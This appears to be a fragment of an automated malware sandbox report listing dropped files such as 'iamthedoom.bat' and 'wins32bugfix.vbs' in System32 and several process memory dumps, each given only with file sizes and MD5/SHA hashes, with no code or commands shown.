1bacacc2b6eb59865eaae4d690f6838d

SHA1
0c5847b096a01ab305296c20e805f2069c8d7c42

SHA256
b74b36c91ef1850828d0f33fbf0981f74c30e4e989bcbd4e62fc1357334f81da

SHA512
c611b6540b2e48283cbf4a8732d957ec700b94f3c78464980d34d09ff26d0c1147689d618d469e1f3051edc2b8436d08bf95e3622ffa0493a6e9ff6ee1c14728

Download Submit
C:\Windows\System32\iamthedoom.bat

Filesize
431B

MD5
7f577772568e8e2166472cfc8576f2a5

SHA1
19f00b639e0456bc990c2506d4e9d516f57a56c3

SHA256
de6bdd7e830e1df26ded7aee443e494869390dd08f2f14de277c4eb56699f640

SHA512
31f06800905fa4031d00c28a003059afa385dcaa4cff606a7805cbada80fdae2ad5518f5939d9a31c9a51dd9a0ea0af1cdb0b9e292d324023dcfbf227d7e47a9

Download Submit
C:\Windows\System32\wins32bugfix.vbs

Filesize
496B

MD5
e2d836beba8f0d92022fc8c07d42f684

SHA1
ca8904c7281ff138afbbb2690862a54ebdbd53e7

SHA256
2581cbeb3f35d83a6f90ed208a1f3ac8e59efbbeafbaab11c9d2b66c2333e1a3

SHA512
ead612bde359a4d0d7b305f8aeaee4d46595c8cbfbfecd0ff76c7dbc1b0156e2a6d5df76787c2c07134df1d4d0122f2b61a51b3287c026ec1e202228f0248ad7

Download Submit
memory/876-3999-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/876-2486-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/2664-3997-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/2664-2484-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/2772-3998-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/2772-2485-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/3036-3916-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/3036-2483-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/3820-2511-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download
memory/3820-4001-0x000007FEF5080000-0x000007FEF50CC000-memory.dmp

Filesize
304KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads